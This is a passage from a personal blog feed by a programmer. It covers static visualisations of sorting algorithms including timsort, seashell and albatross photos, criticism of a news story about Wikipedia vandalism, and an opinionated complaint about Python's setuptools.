href="http://www.flickr.com/photos/8268815@N08/3863256917/" title="056shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2626/3863256917_9da498eb94_t.jpg" width="100" height="100" alt="056shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864040990/" title="057shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2601/3864040990_b6465402e8_t.jpg" width="100" height="100" alt="057shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864042394/" title="059shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2662/3864042394_fd9a3e2f14_t.jpg" width="100" height="100" alt="059shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3864043258/" title="060shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2557/3864043258_2187b97b8c_t.jpg" width="100" height="100" alt="060shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863260683/" title="061shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2553/3863260683_6cc9662275_t.jpg" width="100" height="100" alt="061shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864044842/" title="062shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3181/3864044842_83ed99b591_t.jpg" width="100" height="100" alt="062shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863262185/" title="064shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3454/3863262185_c93aff80f1_t.jpg" width="100" height="100" alt="064shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863263741/" title="065shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2596/3863263741_1de40df77a_t.jpg" width="100" height="100" alt="065shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3863264743/" title="066shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2531/3863264743_e51a081754_t.jpg" width="100" height="100" alt="066shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863265971/" title="067shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2584/3863265971_a540e4cd74_t.jpg" width="100" height="100" alt="067shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863267413/" title="068shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3513/3863267413_efda95bd09_t.jpg" width="100" height="100" alt="068shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863268603/" title="069shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2461/3863268603_49c216a076_t.jpg" width="100" height="100" alt="069shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863270349/" title="070shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2565/3863270349_2df1a30663_t.jpg" width="100" height="100" alt="070shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3863271463/" title="071shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2633/3863271463_b8bb6c9416_t.jpg" width="100" height="100" alt="071shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864056086/" title="072shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2449/3864056086_9bd2441496_t.jpg" width="100" height="100" alt="072shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863273851/" title="073shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863273851_e36366e0aa_t.jpg" width="100" height="100" alt="073shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863275055/" title="074shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3547/3863275055_0b078205e7_t.jpg" width="100" height="100" alt="074shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863276473/" title="075shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3438/3863276473_918bc411d0_t.jpg" width="100" height="100" alt="075shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3864061252/" title="076shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2552/3864061252_48d169eac2_t.jpg" width="100" height="100" alt="076shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864062554/" title="077shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3226/3864062554_3b2ac66bcf_t.jpg" width="100" height="100" alt="077shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864063810/" title="078shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2459/3864063810_5cf4bcfb9a_t.jpg" width="100" height="100" alt="078shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864064924/" title="079shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3511/3864064924_bcb95a8ea2_t.jpg" width="100" height="100" alt="079shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864065752/" title="080shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2519/3864065752_44baaafcef_t.jpg" width="100" height="100" alt="080shells" /></a></td> </tr> </table> <p>Spent the moring collecting and taking photos of tiny seashells on Murdering Beach - a secluded local spot with a grisly past. The shells are all about the same size - a centimeter or so accross - and seem to be from the same species of marine mollusc. The variety of patterns and colours is endless and fascinating - my inexpertly lit photographs don't do them justice.</p> Sorting Algorithm Visualisation Tidbits 2009-08-11T00:00:00+00:00 2009-08-11T00:00:00+00:00 https://corte.si/posts/code/sortingquickies/ <ul> <li>Jacob Seidelin has created an awesome port of the sorting algorithm visualisations I came up with in 2007 to Javascript, using the canvas element to do the drawing. <a href="http://blog.nihilogic.dk/2009/04/canvas-visualizations-of-sorting.html">Well worth checking out</a>.</li> <li>Another blogger (I'd love to be more specific, but the blog seems to be anonymous) was spurred by my post to to wonder what sorting algorithms <em>sound</em> like. The fascinating result is <a href="http://www.pillowsopher.com/blog/?cat=4">over here</a>. Bubblesort turns out to quite musical - who knew?</li> <li>Finally, timsort, which I drew <a href="https://corte.si/posts/code/timsort/">pictures of in my last post</a>, has <a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6804124">replaced mergesort in Java.</a></li> </ul> Visualising Sorting Algorithms: Python's timsort 2009-08-08T00:00:00+00:00 2009-08-08T00:00:00+00:00 https://corte.si/posts/code/timsort/ <p><strong>Update</strong> See <a rel="external" href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p> <p>A couple of years ago, I blogged about a technique I came up with for <a href="https://corte.si/posts/code/visualisingsorting/">statically visualising sorting algorithms</a> during a somewhat Scotch-fueled night of idle hacking. A recent day of poking at the Python codebase gave me an excuse to revisit the post and brush off the bit of code that underpins it. I've wanted to take a closer look at timsort - Tim Peters' wonderful sorting implementation for Python - for a while now. In the previous post I made a big deal about the fact that many attributes of sorting algorithms are easier to see in my static visualisations than in traditional animated equivalents. So, I thought it would be fun to see if one could get to grips with a real-world algorithm like timsort by visualising it. The fruit of my labour can be found below - if this kind of thing turns your crank, read on.</p> <p>Before you go on, you might first want to take a look at the <a href="https://corte.si/posts/code/visualisingsorting/">original post</a> for an explanation of how the diagrams are constructed and some related caveats.</p> <h2 id="inspecting-timsort">Inspecting timsort</h2> <p>The first step was to get hold of the progressive sorting data I needed for the visualisation. The way timsort is implemented has two properties that helped here - firstly, it's largely in-place, and secondly, when interrupted by an exception in the __cmp__ method of one of the elements it is sorting, it leaves the array partially sorted. The pleasant result is that I could get all the data I needed in pure Python, without instrumenting the interpreter source. A link to the code is at the bottom of this post.</p> <h2 id="a-first-guess-at-the-algorithm">A first guess at the algorithm</h2> <p>The first thing I did was to see if I could get a feel for timsort straight from the visualisation, without looking at the implementation (yes, I'm cheating slightly, since I already had an idea of what I would see). Here's timsort sorting a shuffled array of 64 elements:</p> <div class="media"> <a href="64r-tim.png"> <img src="64r-tim.png" /> </a> <div class="subtitle"> timsort - 64 elements </div> </div> <p>It's immediately clear that timsort has divided the data up into two blocks of 32 elements. The blocks are pre-sorted in turn (the first two "triangles" of activity, reading from left to right), before being merged together in the final step (the cross-hatch pattern at the right of the diagram). Looking closer, it's even possible to tell that the pre-sorting seems to be using insertion sort - compare the distinctive triangular pattern here with the insertion sort visualisation in the <a href="https://corte.si/posts/code/visualisingsorting/">previous post</a>. We can confirm this by taking the same data, and running it through an insertion sort visualisation. Here's the first block of 32 elements sorted by insertion sort:</p> <div class="media"> <a href="half.png"> <img src="half.png" /> </a> <div class="subtitle"> Insertion sort </div> </div> <p>As you can see, this sorting sequence is identical to the one in the upper-left part of the timsort diagram. A similar bit of hackery would show that the final merge is done with mergesort. Ok, so at this point, we can take a stab at a broad outline of the timsort algoritm: break the data up into blocks, pre-sort those blocks using insertion sort, and then merge the blocks together using mergesort.</p> <p>This is pretty good going for quick inspection of a single diagram.</p> <h2 id="what-s-actually-happening">What's actually happening</h2> <p>Flicking to the <a href="http://bugs.python.org/file4451/timsort.txt">cheat sheet</a>, we can see that this guess is almost right. The business-end of timsort is a mergesort that operates on runs of pre-sorted elements. A minimum run length <strong>minrun</strong> is chosen to make sure the final merges are as balanced as possible - for 64 elements, <strong>minrun</strong> happens to be 32. Before the merges begin, a single pass is made through the data to detect pre-existing runs of sorted elements. Descending runs are handled by simply reversing them in place. If the resultant run length is less than <strong>minrun</strong>, it is boosted to <strong>minrun</strong> using insertion sort. On a shuffled array with no significant pre-existing runs, this process looks exactly like our guess above: pre-sorting blocks of <strong>minrun</strong> elements using insertion sort, before merging with merge sort.</p> <p>We can see a bit more detail by giving timsort the type of data it excels at - a partially sorted array:</p> <div class="media"> <a href="combo.png"> <img src="combo-annotated.png" /> </a> <div class="subtitle"> timsort - 64 elements </div> </div> <p>Now, looking at the marked progression from left to right:</p> <ul> <li><strong>1)</strong> timsort finds a descending run, and reverses the run in-place. This is done directly on the array of pointers, so seems "instant" from our vantage point.</li> <li><strong>2)</strong> The run is now boosted to length <strong>minrun</strong> using insertion sort.</li> <li><strong>3)</strong> No run is detected at the beginning of the next block, and insertion sort is used to sort the entire block. Note that the sorted elements at the bottom of this block are not treated specially - timsort doesn't detect runs that start in the middle of blocks being boosted to <strong>minrun</strong>.</li> <li><strong>4)</strong> Finally, mergesort is used to merge the runs.</li> </ul> <p>Of course, there's a lot that's not covered here: merge order, stability, the secondary memory requirements of the algorithm, and so forth. Maybe I'll get to some of these in a follow-up post. That said, I think this is still quite a reasonable high-level pictorial guide to timsort.</p> <p>I relied heavily on <a href="http://bugs.python.org/file4451/timsort.txt">Uncle Tim's own description of the algorithm</a> in writing this post - if you're interested in timsort, this document is definitely mandatory reading.</p> <h2 id="the-code">The Code</h2> <p>I've brushed up the code I included in my previous post and put it on <a href="http://github.com/cortesi/sortvis/tree/master">github</a>. You can check it out like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">git</span><span style="color: #032F62;"> clone git://github.com/cortesi/sortvis.git</span></span></code></pre> Buller's Albatross 2009-07-12T00:00:00+00:00 2009-07-12T00:00:00+00:00 https://corte.si/posts/photos/bullers/ <p>An encounter with a magnificent bird today - Buller's Albatross. It glided in to the side of the boat we were in to check if we had any fish, but took off disappointed when it turned out we did not:</p> <center> <a href="http://www.flickr.com/photos/8268815@N08/3715192684/" title="Buller's Albatross by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2610/3715192684_fae89809e5.jpg" width="500" height="189" alt="Buller's Albatross" /></a> </center> How to become a cyber bandit 2008-06-03T00:00:00+00:00 2008-06-03T00:00:00+00:00 https://corte.si/posts/security/badreporting/ <p>I came accross a hilariously inept bit of tech reporting today, courtesy of the Sydney Morning Herald. Apparently the Wikipedia page for Mick Keelty, Australia's Federal Police Commissioner, was vandalised last week. Hardly earth-shattering, right? Just revert the changes, and move on. To a sensation-hungry hack without the faintest clue what Wikipedia is, however, this looks like a Story. More particularly, it looks like a story entitled "<a href="http://www.smh.com.au/news/technology/cyber-bandit-sabotages-top-cop/2008/05/31/1212258621186.html">Cyber bandit sabotages top cop</a>".</p> <p>The article gives a minutely detailed rundown of the rather juvenile vandalism (apparently perpetrated by a not very imaginative 13-year-old), and is accompanied by a stock photo showing a depressed-looking Keelty, evidently meditating on the deep unfairness of it all. The Wikipedia vandal is not just a "cyber bandit" - he is also referred to as a "hacker" throughout. The icing on the cake, however, is what has to be a mis-quote from <a href="http://en.wikipedia.org/wiki/Angela_Beesley">Angela Beesley</a>:</p> <blockquote> <p>Wikimedia Foundation Advisory Board chairwoman Angela Beesley said the person who made the edits infiltrated the site from outside.</p> </blockquote> <p>Infiltrated Wikipedia from the outside? You don't say.</p> setuptools sucks 2007-06-18T00:00:00+00:00 2007-06-18T00:00:00+00:00 https://corte.si/posts/code/setuptoolssucks/ <p>One of the epic conflicts of our time is being waged between two software design philosophies (bear with me here). Those who follow <strong>Design Philosophy A</strong> trust their users. Software is designed to be transparent and easy to inspect. Users are provided with simple and direct ways to control behaviour, and their choices are respected. Software developers avoid guessing the user's intent, since users can be trusted to do the sensible thing themselves. Those who follow <strong>Design Philosophy B</strong> think their users are idiots. Software is therefore opaque and difficult to inspect, because users wouldn't understand what is going on, and should be prevented from even trying. The developer's guess is always more trustworthy than the user's command. Users are robbed of options, because if we give the user too much control, they'll just fuck things up.</p> <p>Philosophy A has given you the open source movement, Unix and the Internet. Philosophy B has given you the Microsoft Paperclip, DRM and an endless stream of clueless MCSEs. Philosophy A stands for open standards, free information exchange, and user control. Philosophy B restricts how you can use information stored on your own computer, violates your privacy, and puts the interests of software makers ahead of that of the user. In corner A stands Richard Stallman, Linus Torvalds and Theo de Raadt, dressed in light and armed with flaming swords. In corner B, wreathed in shadow, stands Bill Gates, a cohort of ignorant greedy politicians and a dark army of patent lawyers.</p> <p>It is against this epic background that I invite you to consider another player on the side of darkness: <a href="http://peak.telecommunity.com/DevCenter/setuptools">setuptools</a>. No, I don't think <a href="http://dirtsimple.org/">Phillip J. Eby</a> is out to take control of your computer and leech your bank account details (though you might well prefer this to his attempts to <a href="http://dirtsimple.org/2007/02/how-not-to-be-loser.html">de-activate your loser circuit</a>). I surely do believe, though, that he thinks you are an idiot. Because setuptools, again and again, makes some decidedly Philosophy B design decisions. Witness:</p> <ul> <li>Setuptools is nosy. It deduces things magically from the version control system you use, so when you enter the Brave New World of <a href=" http://git.or.cz/">distributed versioning</a>, all your build and distribution scripts silently malfunction.</li> <li>Setuptools is needlessly opaque. <a href="http://peak.telecommunity.com/DevCenter/PythonEggs">Eggs</a> break simple transparencies we currently take for granted - for example, we lose the ability to trivially inspect installed libraries with a pager, or to easily list the contents of an installed module. They also complicate more subtle things - because eggs are compressed, project data file access becomes a pain. If you need direct file access, you need to use even MORE setuptools magic to unpack project data files to a temporary directory.</li> <li>Setuptools is obstinate. It will automatically insert .eggs at the head of your sys.path to make sure they get imported in preference to any existing libraries. If I insert something into sys.path (say, for instance, to run a test suite against the development version of my library), I do NOT want my distribution mechanism to over-ride me. And no, using the setuptools development mode magic is not a satisfactory answer.</li> </ul> <p>This type of intrusive design is disrespectful to users. Whenever you prefer to trust your own imperfect guesses, rather than letting the user specify what they want, you are disrespectful to your users. Whenever you needlessly make a system obscure to inspection, you are disrespectful to your users. Whenever you allow your software to spill beyond its rightful bounds (by, for example, getting intimate with my version control system), you are disrespectful to your users.</p> <p>I believe that most people use setuptools because it provides a few simple pieces of functionality that could easily be added to distutils without the dross and bad design. Grafting dependencies and better package data management onto distutils would go about 80% of the way to meeting my modest expectations. Sadly, in one of those minor tragedies that life is so full of, it appears that setuptools <a href="http://mail.python.org/pipermail/python-dev/2006-April/063964.html">wins by default</a>, simply because the problem domain is so goddamn boring that no-one else has bothered.</p> Visualising Sorting Algorithms 2007-04-27T00:00:00+00:00 2007-04-27T00:00:00+00:00 https://corte.si/posts/code/visualisingsorting/ <p><strong>Update</strong> See <a rel="external" href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p> <p>I dislike <a href="http://ftp.csci.csusb.edu/public/class/cs455/cs455_2000/java/InsertionSortLauncher.html">animated</a> <a href="http://www.cs.ubc.ca/~harrison/Java/sorting-demo.html">sorting</a> <a href="http://www2.hawaii.edu/~copley/665/HSApplet.html">algorithm</a> <a href="http://en.wikipedia.org/wiki/Image:Sorting_heapsort_anim.gif">visualisations</a> - there's too much of an air of hocus-pocus about them. Something impressive and complicated happens on screen, but more often than not the audience is left mystified. I think their creators must also know that they have precious little explanatory value, because the better ones are sexed up with play-by-play doodles, added, one feels, as an apologetic afterthought by some particularly dorky sportscaster. Nevertheless I've been unable to find a single attempt to visualise a sorting algorithm statically (if you know of any, please drop me a line).</p> <p>So, presented below are the results of a pleasant evening with some nice Scotch and the third volume of Knuth. First, here's a taster - a static visualisation of heapsort:</p> <div class="media"> <a href="heap.png"> <img src="heap.png" /> </a> <div class="subtitle"> Heapsort </div> </div> <p>I think these simple static visualisations are much clearer than most animated attempts - and they have the added benefit of also being, to my not entirely unbiased eye, rather beautiful. You will find more visualisations, source code, and a tediously long explanation of why I bothered, after the jump.</p> <h2 id="the-problem">The Problem</h2> <p>Before I go on, though, bear with me while I press home my point about animation with a particularly heinous example of the genre. I found the following specimen on the <a href="http://en.wikipedia.org/wiki/Bubblesort">Wikipedia page for Bubblesort</a>:</p> <div class="media"> <a href="bubble_sort_animation.gif"> <img src="bubble_sort_animation.gif" /> </a> <div class="subtitle"> Bubblesort visualisation from Wikipedia </div> </div> <p>Now, it is my measured opinion that this animation has all the explanatory power of a glob of porridge flung against a wall. To see why I say this, try to find rough answers to the following set of simple questions with reference to it:</p> <ul> <li>After what percentage of time is half of the array sorted?</li> <li>Can you find an element that moved about half the length of the array to reach its final destination?</li> <li>What percentage of the array was sorted after 80% of the sorting process? How about 20%?</li> <li>Does the number of sorted elements grow linearly or non-linearly with time (i.e. logarithmically or exponentially)?</li> </ul> <p>If you thought that was harder than it needed to be, blame animation. First, while humans are great at estimating distances in space, they are pretty bad at estimating distances in time. This is why you had to watch the animation two or three times to answer the first question. When we translate time to a geometric length, as is done in any scientific diagram with a time dimension, this estimation process becomes easy. Second, many questions about sorting algorithms require us to actively compare the sorting state at two or more different time points. Since we don't have perfect memories, this is very, very hard in all but the simplest cases. This leaves us with a strangely one-dimensional view into an animation - we can see what's on screen at any given moment, but we have to strain to answer simple questions about, say, rates of change. Which is why the final question is hard to answer accurately.</p> <h2 id="finding-flatland">Finding Flatland</h2> <p>It turns out that it is pretty easy to find a static, two-dimensional encoding for the sorting process. The specific technique used here only works when the sorting algorithm is in-place, i.e. does not use any storage external to the array itself. Some of the algorithms below have been slightly modified from their standard forms to make sure they have this property. The magnitude of a number is indicated by shading - higher numbers are darker, and lower numbers are lighter. We begin on the left hand side with the numbers in a random order, and the sorting progression plays out until we reach the right hand side with a sorted sequence. Time, in this particular case, is measured by the number of "swaps" performed. This means that all swaps are equidistant on the diagram, and that only a single swap occurs at any point in time. When I refer to "time" when talking about these diagrams, I am therefore not referring to clock time.</p> <p>Now, I should be clear at the outset that I haven't tried to pack these diagrams with as much information as possible. For example, I don't include tick marks for time units, nor do I explicitly mark algorithm details like Instead, I've simply tried to produce images that give a clear sense of the "flow" over time of the algorithms, while simultaneously not being an eyesore. I might produce some scaled-up annotated versions of the diagrams for some future post.</p> <h2 id="bubblesort">Bubblesort</h2> <div class="media"> <a href="bubble.png"> <img src="bubble.png" /> </a> <div class="subtitle"> Bubble sort </div> </div> <p>So, lets start with a static visualisation of <a href="http://en.wikipedia.org/wiki/Bubble_sort">bubblesort</a>. Notice that, even without any labelling, we can "read off" the answers to all the questions posed above pretty trivially:</p> <ul> <li>The sorted portion of the sequence is clearly visible as a triangular block in the bottom-right of the image, so we can easily locate the point at which half the array is sorted, and read off the percentage of time taken.</li> <li>Since the start and end positions of each element is visible on the graph, finding an element that moved about 50% of the length of the array is simple.</li> <li>Similarly, the percentage of the array that is sorted at 20% and 80% of the process can just be read off.</li> <li>Lastly, we can clearly see that the curve of sorted elements is not linear, but is probably close to n^2.</li> </ul> <p>Other features of the algorithm are also clearer - for instance, the famous "rabbits" and "turtles" are clearly identifiable. In the diagram the "rabbits" are the dark lines sweeping down to their positions rapidly, and the turtles are the lighter lines that gradually curve towards the top right of the image.</p> <h2 id="heapsort">Heapsort</h2> <div class="media"> <a href="heap.png"> <img src="heap.png" /> </a> <div class="subtitle"> Heapsort </div> </div> <p>Now, lets return to the <a href="http://en.wikipedia.org/wiki/Heapsort">heapsort</a> image at the top of this article. First, a quick (and superficial) refresher on the algorithm itself:</p> <ul> <li>Step 1: Arrange the elements in the array to form a "heap" - a data structure that allows us to find the largest element in constant time.</li> <li>Step 2: Peel off the largest element, and move it to below the heap.</li> <li>Step 3: The heap is now disrupted, so we do some work to re-establish the heap property.</li> <li>Step 4: Repeat steps 2-3 until the entire array is sorted.</li> </ul> <p>Looking at the visualisation, we can see Step 1 clearly - it is the portion of the diagram before the point where the largest element in the array is slotted into place. After that, we can see a repeated pattern - the heap is re-established and the greatest element is moved to below the heap again and again util the array is sorted.</p> <p>We can immediately make some quite sophisticated observations. For example, we can see that although initially establishing the heap is costly, re-establishing it after the greatest element is removed requires an approximately constant amount of time throughout the sorting process - meaning that the time required is relatively independent of the number of items still in the heap. This is an interesting property that is not immediately obvious from an analysis of the algorithm itself.</p> <p>Right - enough prattling! Here is a selection of other visualised algorithms for your viewing pleasure:</p> <h2 id="quicksort">Quicksort</h2> <div class="media"> <a href="quick.png"> <img src="quick.png" /> </a> <div class="subtitle"> Quicksort </div> </div><h2 id="selection-sort">Selection Sort</h2> <div class="media"> <a href="selection.png"> <img src="selection.png" /> </a> <div class="subtitle"> Selection sort </div> </div><h2 id="insertion-sort">Insertion Sort</h2> <div class="media"> <a href="listinsertion.png"> <img src="listinsertion.png" /> </a> <div class="subtitle"> Insertion sort </div> </div><h2 id="shell-sort">Shell Sort</h2> <div class="media"> <a href="shell.png"> <img src="shell.png" /> </a> <div class="subtitle"> Shell sort </div> </div><h2 id="the-code">The Code</h2> <p><a href="visualise.py">visualise.py</a></p> <p>This whole thing started partly as an excuse to get familiar with the <a href="http://cairographics.org">Cairo</a> graphics library. It produces beautiful, clean images, and appears to be both portable and well designed. It also comes with a set of Python bindings that are maintained as part of the project itself - a big plus in my books. Firefox 3 will use Cairo as its standard rendering back end, which will instantly make it one of the most widely used vector graphics libraries out there.</p> <p>The examples on this page were generated using a command somewhat like the following:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./visualise.py</span><span style="color: #005CC5;"> -l 6 -x 700 -y 300 -n 15</span></span></code></pre> <p><strong>Update 9/8/09</strong>: A newer version of the code is now available on <a href="http://github.com/cortesi/sortvis/tree/master">github</a>. You can check it out like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">git</span><span style="color: #032F62;"> clone git://github.com/cortesi/sortvis.git</span></span></code></pre>